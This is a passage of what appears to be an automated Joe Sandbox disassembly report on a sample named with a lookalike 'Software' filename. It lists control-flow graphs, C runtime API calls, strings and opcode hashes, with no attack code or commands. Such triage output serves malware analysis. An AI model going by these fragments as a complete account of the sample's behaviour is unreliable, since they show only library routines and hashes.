                                                                                            • API String ID:
                                                                                            • Opcode ID: 3940700e1baaa0d0eeee129a3909170ae08500f5026dffdff98a13603b77694a
                                                                                            • Instruction ID: f7e3acfea1ab3fea910d867ea94b90ec71d33c5fac3674657d0736fc6f03cb85
                                                                                            • Opcode Fuzzy Hash: 3940700e1baaa0d0eeee129a3909170ae08500f5026dffdff98a13603b77694a
                                                                                            • Instruction Fuzzy Hash: 7221C733A636184BE310CD69CC807957696A7DD338F3E47B889744B7D2D97B6D138680
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1999593272.000000006CDC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CDC0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1999579232.000000006CDC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1999616065.000000006CDDC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1999631815.000000006CDE2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1999678394.000000006CE30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_6cdc0000_S#U043eftWare.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 8d52fb2acaea47cc711755e886856fc2c512988177476dc3ebe6c672e5574d84
                                                                                            • Instruction ID: c3a376695253bf4078df83bf2b5424d4ad27b67fcbbde77ceca6cee1b1921d7d
                                                                                            • Opcode Fuzzy Hash: 8d52fb2acaea47cc711755e886856fc2c512988177476dc3ebe6c672e5574d84
                                                                                            • Instruction Fuzzy Hash: 8FE0EC72D26228EBCB15DF9CC944A9AB3ECEB45B54B1245A6B516D3621D270EE00CBD0

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 1989 6cdd6f1a-6cdd6f2e 1990 6cdd6f9c-6cdd6fa4 1989->1990 1991 6cdd6f30-6cdd6f35 1989->1991 1992 6cdd6feb-6cdd7003 call 6cdd708b 1990->1992 1993 6cdd6fa6-6cdd6fa9 1990->1993 1991->1990 1994 6cdd6f37-6cdd6f3c 1991->1994 2001 6cdd7006-6cdd700d 1992->2001 1993->1992 1995 6cdd6fab-6cdd6fe8 call 6cdd4833 * 4 1993->1995 1994->1990 1997 6cdd6f3e-6cdd6f41 1994->1997 1995->1992 1997->1990 1999 6cdd6f43-6cdd6f4b 1997->1999 2002 6cdd6f4d-6cdd6f50 1999->2002 2003 6cdd6f65-6cdd6f6d 1999->2003 2005 6cdd702c-6cdd7030 2001->2005 2006 6cdd700f-6cdd7013 2001->2006 2002->2003 2007 6cdd6f52-6cdd6f64 call 6cdd4833 call 6cdd8e47 2002->2007 2008 6cdd6f6f-6cdd6f72 2003->2008 2009 6cdd6f87-6cdd6f9b call 6cdd4833 * 2 2003->2009 2016 6cdd7048-6cdd7054 2005->2016 2017 6cdd7032-6cdd7037 2005->2017 2011 6cdd7029 2006->2011 2012 6cdd7015-6cdd7018 2006->2012 2007->2003 2008->2009 2014 6cdd6f74-6cdd6f86 call 6cdd4833 call 6cdd8f45 2008->2014 2009->1990 2011->2005 2012->2011 2021 6cdd701a-6cdd7028 call 6cdd4833 * 2 2012->2021 2014->2009 2016->2001 2020 6cdd7056-6cdd7061 call 6cdd4833 2016->2020 2025 6cdd7039-6cdd703c 2017->2025 2026 6cdd7045 2017->2026 2021->2011 2025->2026 2033 6cdd703e-6cdd7044 call 6cdd4833 2025->2033 2026->2016 2033->2026
                                                                                            APIs
                                                                                            • ___free_lconv_mon.LIBCMT ref: 6CDD6F5E
                                                                                              • Part of subcall function 6CDD8E47: _free.LIBCMT ref: 6CDD8E64
                                                                                              • Part of subcall function 6CDD8E47: _free.LIBCMT ref: 6CDD8E76
                                                                                              • Part of subcall function 6CDD8E47: _free.LIBCMT ref: 6CDD8E88
                                                                                              • Part of subcall function 6CDD8E47: _free.LIBCMT ref: 6CDD8E9A
                                                                                              • Part of subcall function 6CDD8E47: _free.LIBCMT ref: 6CDD8EAC
                                                                                              • Part of subcall function 6CDD8E47: _free.LIBCMT ref: 6CDD8EBE
                                                                                              • Part of subcall function 6CDD8E47: _free.LIBCMT ref: 6CDD8ED0
                                                                                              • Part of subcall function 6CDD8E47: _free.LIBCMT ref: 6CDD8EE2
                                                                                              • Part of subcall function 6CDD8E47: _free.LIBCMT ref: 6CDD8EF4
                                                                                              • Part of subcall function 6CDD8E47: _free.LIBCMT ref: 6CDD8F06
                                                                                              • Part of subcall function 6CDD8E47: _free.LIBCMT ref: 6CDD8F18
                                                                                              • Part of subcall function 6CDD8E47: _free.LIBCMT ref: 6CDD8F2A
                                                                                              • Part of subcall function 6CDD8E47: _free.LIBCMT ref: 6CDD8F3C
                                                                                            • _free.LIBCMT ref: 6CDD6F53
                                                                                              • Part of subcall function 6CDD4833: HeapFree.KERNEL32(00000000,00000000,?,6CDD3A6F), ref: 6CDD4849
                                                                                              • Part of subcall function 6CDD4833: GetLastError.KERNEL32(?,?,6CDD3A6F), ref: 6CDD485B
                                                                                            • _free.LIBCMT ref: 6CDD6F75
                                                                                            • _free.LIBCMT ref: 6CDD6F8A
                                                                                            • _free.LIBCMT ref: 6CDD6F95
                                                                                            • _free.LIBCMT ref: 6CDD6FB7
                                                                                            • _free.LIBCMT ref: 6CDD6FCA
                                                                                            • _free.LIBCMT ref: 6CDD6FD8
                                                                                            • _free.LIBCMT ref: 6CDD6FE3
                                                                                            • _free.LIBCMT ref: 6CDD701B
                                                                                            • _free.LIBCMT ref: 6CDD7022
                                                                                            • _free.LIBCMT ref: 6CDD703F
                                                                                            • _free.LIBCMT ref: 6CDD7057
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1999593272.000000006CDC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CDC0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1999579232.000000006CDC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1999616065.000000006CDDC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1999631815.000000006CDE2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1999678394.000000006CE30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_6cdc0000_S#U043eftWare.jbxd
                                                                                            Similarity
                                                                                            • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                            • String ID: @l
                                                                                            • API String ID: 161543041-4025332666
                                                                                            • Opcode ID: 3ed15d053062447d99b5ed97fb42c68b53dbfc48da722fc53bdc2a3f79136397
                                                                                            • Instruction ID: dcccb129da85af74d762c44945a978fffac516ef0946cff790cafcc5e23d16ea
                                                                                            • Opcode Fuzzy Hash: 3ed15d053062447d99b5ed97fb42c68b53dbfc48da722fc53bdc2a3f79136397
                                                                                            • Instruction Fuzzy Hash: BE319031E04700EFE7214B75D804B9AB3F9AF00358F22486AE064D7AB4DB31F985C761

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 2472 6cdd40f3-6cdd4106 2473 6cdd4108-6cdd4111 call 6cdd4833 2472->2473 2474 6cdd4112-6cdd41bf call 6cdd4833 * 9 call 6cdd3f1f call 6cdd3f8a 2472->2474 2473->2474
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1999593272.000000006CDC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CDC0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1999579232.000000006CDC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1999616065.000000006CDDC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1999631815.000000006CDE2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1999678394.000000006CE30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_6cdc0000_S#U043eftWare.jbxd
                                                                                            Similarity
                                                                                            • API ID: _free$ErrorFreeHeapLast
                                                                                            • String ID:
                                                                                            • API String ID: 776569668-0
                                                                                            • Opcode ID: 8c32475bf07080966653573cf14eed91620dd951c697c7a0c4bc743ec4a5ea65
                                                                                            • Instruction ID: ea26c10f788c820b7aaec02716732efdddd83070a165bd195df5ff891b698bb8
                                                                                            • Opcode Fuzzy Hash: 8c32475bf07080966653573cf14eed91620dd951c697c7a0c4bc743ec4a5ea65
                                                                                            • Instruction Fuzzy Hash: 2B21BA76D04108AFCB41DFA4C894DDDBBB9BF08244F414166E915DB731DB71EA89CB90

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 2499 6cdd26d0-6cdd2721 call 6cddb360 call 6cdd2690 call 6cdd2b17 2506 6cdd277d-6cdd2780 2499->2506 2507 6cdd2723-6cdd2735 2499->2507 2508 6cdd27a0-6cdd27a9 2506->2508 2509 6cdd2782-6cdd278f call 6cdd2b00 2506->2509 2507->2508 2510 6cdd2737-6cdd274e 2507->2510 2515 6cdd2794-6cdd279d call 6cdd2690 2509->2515 2512 6cdd2764 2510->2512 2513 6cdd2750-6cdd275e call 6cdd2aa0 2510->2513 2514 6cdd2767-6cdd276c 2512->2514 2520 6cdd2774-6cdd277b 2513->2520 2521 6cdd2760 2513->2521 2514->2510 2517 6cdd276e-6cdd2770 2514->2517 2515->2508 2517->2508 2522 6cdd2772 2517->2522 2520->2515 2524 6cdd27aa-6cdd27b3 2521->2524 2525 6cdd2762 2521->2525 2522->2515 2526 6cdd27ed-6cdd27fd call 6cdd2ae0 2524->2526 2527 6cdd27b5-6cdd27bc 2524->2527 2525->2514 2533 6cdd27ff-6cdd280e call 6cdd2b00 2526->2533 2534 6cdd2811-6cdd282d call 6cdd2690 call 6cdd2ac0 2526->2534 2527->2526 2528 6cdd27be-6cdd27cd call 6cddb200 2527->2528 2536 6cdd27cf-6cdd27e7 2528->2536 2537 6cdd27ea 2528->2537 2533->2534 2536->2537 2537->2526
                                                                                            APIs
                                                                                            • _ValidateLocalCookies.LIBCMT ref: 6CDD2707
                                                                                            • ___except_validate_context_record.LIBVCRUNTIME ref: 6CDD270F
                                                                                            • _ValidateLocalCookies.LIBCMT ref: 6CDD2798
                                                                                            • __IsNonwritableInCurrentImage.LIBCMT ref: 6CDD27C3
                                                                                            • _ValidateLocalCookies.LIBCMT ref: 6CDD2818
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1999593272.000000006CDC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CDC0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1999579232.000000006CDC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1999616065.000000006CDDC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1999631815.000000006CDE2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1999678394.000000006CE30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_6cdc0000_S#U043eftWare.jbxd
                                                                                            Similarity
                                                                                            • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                            • String ID: csm
                                                                                            • API String ID: 1170836740-1018135373
                                                                                            • Opcode ID: bacfd2db2ac699017f48401a91a39097ebce5dcefcc8866042e1d78cdff7f209
                                                                                            • Instruction ID: 357fcec65c3c36a2970918dc55e3e80e3ecacc6459931f8b7e70352b9cb05e8a
                                                                                            • Opcode Fuzzy Hash: bacfd2db2ac699017f48401a91a39097ebce5dcefcc8866042e1d78cdff7f209
                                                                                            • Instruction Fuzzy Hash: BE41B334E01219EBCF10DF68C888A9E7BB5EF4532CF168195E8149B761D735BD05CBA0

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 2545 6cdd5d5a-6cdd5d66 2546 6cdd5e0d-6cdd5e10 2545->2546 2547 6cdd5d6b-6cdd5d7c 2546->2547 2548 6cdd5e16 2546->2548 2550 6cdd5d7e-6cdd5d81 2547->2550 2551 6cdd5d89-6cdd5da2 LoadLibraryExW 2547->2551 2549 6cdd5e18-6cdd5e1c 2548->2549 2552 6cdd5e0a 2550->2552 2553 6cdd5d87 2550->2553 2554 6cdd5df4-6cdd5dfd 2551->2554 2555 6cdd5da4-6cdd5dad GetLastError 2551->2555 2552->2546 2556 6cdd5e06-6cdd5e08 2553->2556 2554->2556 2559 6cdd5dff-6cdd5e00 FreeLibrary 2554->2559 2557 6cdd5daf-6cdd5dc1 call 6cdd3e93 2555->2557 2558 6cdd5de4 2555->2558 2556->2552 2560 6cdd5e1d-6cdd5e1f 2556->2560 2557->2558 2565 6cdd5dc3-6cdd5dd5 call 6cdd3e93 2557->2565 2562 6cdd5de6-6cdd5de8 2558->2562 2559->2556 2560->2549 2562->2554 2564 6cdd5dea-6cdd5df2 2562->2564 2564->2552 2565->2558 2568 6cdd5dd7-6cdd5de2 LoadLibraryExW 2565->2568 2568->2562
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1999593272.000000006CDC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CDC0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1999579232.000000006CDC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1999616065.000000006CDDC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1999631815.000000006CDE2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1999678394.000000006CE30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_6cdc0000_S#U043eftWare.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: api-ms-$ext-ms-
                                                                                            • API String ID: 0-537541572
                                                                                            • Opcode ID: 81f436bf7030f3acee861998b3b5ef50476a393eb019bc61d74e2d9774145803
                                                                                            • Instruction ID: 1d74ff950588e3654d41d838ec2dd4c0bae081eabd098c06fdfb461cdd3a501d
                                                                                            • Opcode Fuzzy Hash: 81f436bf7030f3acee861998b3b5ef50476a393eb019bc61d74e2d9774145803
                                                                                            • Instruction Fuzzy Hash: 7021A8B1E49222EBDB115F698C44B5A3778DF42768F270611E955AB6A0F630F90087F0
                                                                                            APIs
                                                                                              • Part of subcall function 6CDD8FAE: _free.LIBCMT ref: 6CDD8FD3
                                                                                            • _free.LIBCMT ref: 6CDD9034
                                                                                              • Part of subcall function 6CDD4833: HeapFree.KERNEL32(00000000,00000000,?,6CDD3A6F), ref: 6CDD4849
                                                                                              • Part of subcall function 6CDD4833: GetLastError.KERNEL32(?,?,6CDD3A6F), ref: 6CDD485B
                                                                                            • _free.LIBCMT ref: 6CDD903F
                                                                                            • _free.LIBCMT ref: 6CDD904A
                                                                                            • _free.LIBCMT ref: 6CDD909E
                                                                                            • _free.LIBCMT ref: 6CDD90A9
                                                                                            • _free.LIBCMT ref: 6CDD90B4
                                                                                            • _free.LIBCMT ref: 6CDD90BF
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1999593272.000000006CDC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CDC0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1999579232.000000006CDC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1999616065.000000006CDDC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1999631815.000000006CDE2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1999678394.000000006CE30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_6cdc0000_S#U043eftWare.jbxd
                                                                                            Similarity
                                                                                            • API ID: _free$ErrorFreeHeapLast
                                                                                            • String ID:
                                                                                            • API String ID: 776569668-0
                                                                                            • Opcode ID: dba89b370ee39ac0f45967c0e0b134501bc874e19b3d39271a970ecfa01c269e
                                                                                            • Instruction ID: dc174ab35011b60c8398353a6b646aed23c2ed9455193f4c5a68d7e970c2b599
                                                                                            • Opcode Fuzzy Hash: dba89b370ee39ac0f45967c0e0b134501bc874e19b3d39271a970ecfa01c269e
                                                                                            • Instruction Fuzzy Hash: 03116371D40B44BAD531ABB0CC09FCBF7DE6F40714F420826A299A6B70DB75B54987A1
                                                                                            APIs
                                                                                            • GetConsoleOutputCP.KERNEL32(?,00000001,?), ref: 6CDD8147
                                                                                            • __fassign.LIBCMT ref: 6CDD832C
                                                                                            • __fassign.LIBCMT ref: 6CDD8349
                                                                                            • WriteFile.KERNEL32(?,6CDD68E5,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6CDD8391
                                                                                            • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 6CDD83D1
                                                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 6CDD8479
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1999593272.000000006CDC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CDC0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1999579232.000000006CDC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1999616065.000000006CDDC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1999631815.000000006CDE2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1999678394.000000006CE30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_6cdc0000_S#U043eftWare.jbxd
                                                                                            Similarity
                                                                                            • API ID: FileWrite__fassign$ConsoleErrorLastOutput
                                                                                            • String ID:
                                                                                            • API String ID: 1735259414-0
                                                                                            • Opcode ID: e8efb7948f54c4ee52524da96c73b06f3b8ce5dfb01e34ec6b9f3bcc46d9d359
                                                                                            • Instruction ID: 80d9c0b9ef3f06f586af8bb8832a7ddce7137e6a605ee03e418c6a21a5140933
                                                                                            • Opcode Fuzzy Hash: e8efb7948f54c4ee52524da96c73b06f3b8ce5dfb01e34ec6b9f3bcc46d9d359
                                                                                            • Instruction Fuzzy Hash: 4FC19E71D012589FCB06CFE8C880AEDFBB9EF09314F29516AD855B7751D231A906CFA0
                                                                                            APIs
                                                                                            • GetLastError.KERNEL32(00000001,?,6CDD2875,6CDD19A0,6CDD13B9,?,6CDD15F1,?,00000001,?,?,00000001,?,6CDE1120,0000000C,6CDD16EA), ref: 6CDD2BB5
                                                                                            • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 6CDD2BC3
                                                                                            • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 6CDD2BDC
                                                                                            • SetLastError.KERNEL32(00000000,6CDD15F1,?,00000001,?,?,00000001,?,6CDE1120,0000000C,6CDD16EA,?,00000001,?), ref: 6CDD2C2E
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1999593272.000000006CDC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CDC0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1999579232.000000006CDC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1999616065.000000006CDDC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1999631815.000000006CDE2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1999678394.000000006CE30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_6cdc0000_S#U043eftWare.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorLastValue___vcrt_
                                                                                            • String ID:
                                                                                            • API String ID: 3852720340-0
                                                                                            • Opcode ID: 43da39421beed785398b8b8a7970d5cffa8757832e1ab9ea669d7969d862f77c
                                                                                            • Instruction ID: 76bb2b8d5af2f1708a637364b1ee73613b08efd1ac70ce070739f0725da61c09
                                                                                            • Opcode Fuzzy Hash: 43da39421beed785398b8b8a7970d5cffa8757832e1ab9ea669d7969d862f77c
                                                                                            • Instruction Fuzzy Hash: ED01F533E097229EAA1527B97C8895736B4DB0A37D7260329E52082AF4EF56BC045390
                                                                                            Strings
                                                                                            • C:\Users\user\Desktop\S#U043eftWare.exe, xrefs: 6CDD50A4
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1999593272.000000006CDC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CDC0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1999579232.000000006CDC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1999616065.000000006CDDC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1999631815.000000006CDE2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1999678394.000000006CE30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_6cdc0000_S#U043eftWare.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: C:\Users\user\Desktop\S#U043eftWare.exe
                                                                                            • API String ID: 0-2954152740
                                                                                            • Opcode ID: c49473e44d384b75473d7dfdf7b973f7917797b2a16eb59bbfac9ad9edbd61f5
                                                                                            • Instruction ID: 1a709b6029802edf2a92c3e6399d7e3a1b98cbd51f8cb6e9deefffb55a0312c6
                                                                                            • Opcode Fuzzy Hash: c49473e44d384b75473d7dfdf7b973f7917797b2a16eb59bbfac9ad9edbd61f5
                                                                                            • Instruction Fuzzy Hash: 05215EB1E04205BF9B10AF658C80D9B77ADEF0536D71A8616F52596A60F731FC148BB0
                                                                                            APIs
                                                                                            • FreeLibrary.KERNEL32(00000000,?,?,6CDD2DE4,00000000,?,00000001,00000000,?,6CDD2E5B,00000001,FlsFree,6CDDCD3C,FlsFree,00000000), ref: 6CDD2DB3
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1999593272.000000006CDC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CDC0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1999579232.000000006CDC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1999616065.000000006CDDC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1999631815.000000006CDE2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1999678394.000000006CE30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_6cdc0000_S#U043eftWare.jbxd
                                                                                            Similarity
                                                                                            • API ID: FreeLibrary
                                                                                            • String ID: api-ms-
                                                                                            • API String ID: 3664257935-2084034818
                                                                                            • Opcode ID: eb866a30a526b997ff0677f020197792a052c3e7bd82a531d43784363cb041e9
                                                                                            • Instruction ID: e8efdfc7d070c1420b0129867963b75193fe4dbf32711c6fc8a3f7670526d677
                                                                                            • Opcode Fuzzy Hash: eb866a30a526b997ff0677f020197792a052c3e7bd82a531d43784363cb041e9
                                                                                            • Instruction Fuzzy Hash: 3C11A331E45621EBEB229F688C48B4933B8AF42768F270210FA10EB694D770FD0087E0
                                                                                            APIs
                                                                                            • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,6CDD338F,?,?,6CDD3357,?,00000001,?), ref: 6CDD33F2
                                                                                            • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 6CDD3405
                                                                                            • FreeLibrary.KERNEL32(00000000,?,?,6CDD338F,?,?,6CDD3357,?,00000001,?), ref: 6CDD3428
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1999593272.000000006CDC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CDC0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1999579232.000000006CDC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1999616065.000000006CDDC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1999631815.000000006CDE2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1999678394.000000006CE30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_6cdc0000_S#U043eftWare.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressFreeHandleLibraryModuleProc
                                                                                            • String ID: CorExitProcess$mscoree.dll
                                                                                            • API String ID: 4061214504-1276376045
                                                                                            • Opcode ID: 9b3d0f8f899cdfa8c3da466f4411853884aa390d1d366f5627d476bb232ec338
                                                                                            • Instruction ID: daa45f244b5330766c611af8b63023142f4237df625df41f706fd7e39b2846d9
                                                                                            • Opcode Fuzzy Hash: 9b3d0f8f899cdfa8c3da466f4411853884aa390d1d366f5627d476bb232ec338
                                                                                            • Instruction Fuzzy Hash: A0F01235E01519FBEF02AB51CD09B9E7B7DEB8175AF214064E501A3560CB34EE04DB90
                                                                                            APIs
                                                                                            • __alloca_probe_16.LIBCMT ref: 6CDD7A7B
                                                                                            • __alloca_probe_16.LIBCMT ref: 6CDD7B41
                                                                                            • __freea.LIBCMT ref: 6CDD7BAD
                                                                                              • Part of subcall function 6CDD6BAE: HeapAlloc.KERNEL32(00000000,6CDD68E5,6CDD68E5,?,6CDD55E3,00000220,?,6CDD68E5,?,?,?,?,6CDD8A01,00000001,?,?), ref: 6CDD6BE0
                                                                                            • __freea.LIBCMT ref: 6CDD7BB6
                                                                                            • __freea.LIBCMT ref: 6CDD7BD9
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1999593272.000000006CDC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CDC0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1999579232.000000006CDC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1999616065.000000006CDDC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1999631815.000000006CDE2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1999678394.000000006CE30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_6cdc0000_S#U043eftWare.jbxd
                                                                                            Similarity
                                                                                            • API ID: __freea$__alloca_probe_16$AllocHeap
                                                                                            • String ID:
                                                                                            • API String ID: 1096550386-0
                                                                                            • Opcode ID: 74a66dea30ee76c1710a41073123ef529aa019b809f2d7b83d6ee95e6e8b457a
                                                                                            • Instruction ID: f6eeb079694653744f6a6071677a18403229135141eda901a1d715d9ea071de3
                                                                                            • Opcode Fuzzy Hash: 74a66dea30ee76c1710a41073123ef529aa019b809f2d7b83d6ee95e6e8b457a
                                                                                            • Instruction Fuzzy Hash: 25519072D01216BBEB208F64CC80EBB36A9EF85758F270199FD1497A64E774FD1187A0
                                                                                            APIs
                                                                                            • _free.LIBCMT ref: 6CDD8F5D
                                                                                              • Part of subcall function 6CDD4833: HeapFree.KERNEL32(00000000,00000000,?,6CDD3A6F), ref: 6CDD4849
                                                                                              • Part of subcall function 6CDD4833: GetLastError.KERNEL32(?,?,6CDD3A6F), ref: 6CDD485B
                                                                                            • _free.LIBCMT ref: 6CDD8F6F
                                                                                            • _free.LIBCMT ref: 6CDD8F81
                                                                                            • _free.LIBCMT ref: 6CDD8F93
                                                                                            • _free.LIBCMT ref: 6CDD8FA5
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1999593272.000000006CDC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CDC0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1999579232.000000006CDC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1999616065.000000006CDDC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1999631815.000000006CDE2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1999678394.000000006CE30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_6cdc0000_S#U043eftWare.jbxd
                                                                                            Similarity
                                                                                            • API ID: _free$ErrorFreeHeapLast
                                                                                            • String ID:
                                                                                            • API String ID: 776569668-0
                                                                                            • Opcode ID: dbacf9e9063e7b8cb696e162a0ac995eb619777845b30cb78a815c475f275a6e
